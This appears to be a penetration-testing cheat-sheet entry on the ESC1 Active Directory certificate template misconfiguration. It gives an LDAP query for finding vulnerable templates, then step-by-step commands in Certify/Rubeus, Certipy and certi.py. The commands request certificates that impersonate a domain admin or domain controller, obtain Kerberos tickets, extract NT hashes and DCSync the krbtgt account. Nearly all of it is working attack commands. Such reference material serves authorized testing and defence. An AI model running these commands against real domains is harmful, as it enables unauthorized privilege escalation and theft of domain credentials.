ESC1
Modifiable SAN + Smart Card Logon or Client Authentication or PKINIT Client Authentication EKUs
The vulnerable certificate template allows requesters to specify a SAN in the CSR as well as allows Smart Card Logon (1.3.6.1.4.1.311.20.2.2) or Client Authentication (1.3.6.1.5.5.7.3.2) or PKINIT Client Authentication (1.3.6.1.5.2.3.4) EKUs.

Enumerate

Find template with this misconfiguration with native Active Directory module:
PS > Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=megacorp,DC=local'

Exploit

Certify

Request a certificate specifying the /altname as a domain admin:
Cmd > .\Certify.exe request /ca:CA01.megacorp.local\CorpCA /template:VulnTemplate /altname:DomAdmin
Convert .pem to a .pfx certificate:
$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Request a TGT with the .pfx certificate:
Cmd > .\Rubeus.exe asktgt /domain:megacorp.local /dc:DC01.megacorp.local /user:DomAdmin /certificate:cert.pfx /password:Passw0rdPfx! /ptt

Certipy

Enroll a certificate with privileged subject in SAN:
$ certipy req megacorp.local/snovvcrash:'Passw0rd!'@CA01.megacorp.local -ca CorpCA -template VulnTemplate -alt '[email protected]'
Request TGT providing certificate and get corresponding NT hash automatically:
$ certipy auth -pfx administrator.pfx -domain megacorp.local -username administrator -dc-ip 192.168.1.11

certi

Enroll a certificate with privileged subject in SAN:
$ certi.py req megacorp.local/[email protected] CorpCA -k -n --dc-ip 192.168.1.11 --template VulnTemplate --alt-name 'DC01#x27;
Request TGT providing certificate:
$ base64 -w0 DC01.pfx > DC01.pfx.b64
$ python3 gettgtpkinit.py megacorp.local/'DC01#x27; -pfx-base64 `cat DC01.pfx.b64` -pfx-pass admin -dc-ip 192.168.1.11 DC01.ccache
Request NT hash providing TGT or DCSync:
$ KRB5CCNAME=DC01.ccache python3 getnthash.py megacorp.local/'DC01#x27; -dc-ip 192.168.1.11 -key <AS_REP_ENC_KEY>
$ KRB5CCNAME=DC01.ccache secretsdump.py DC02.megacorp.local -dc-ip 192.168.1.11 -just-dc-user 'MEGACORP\krbtgt' -k -no-pass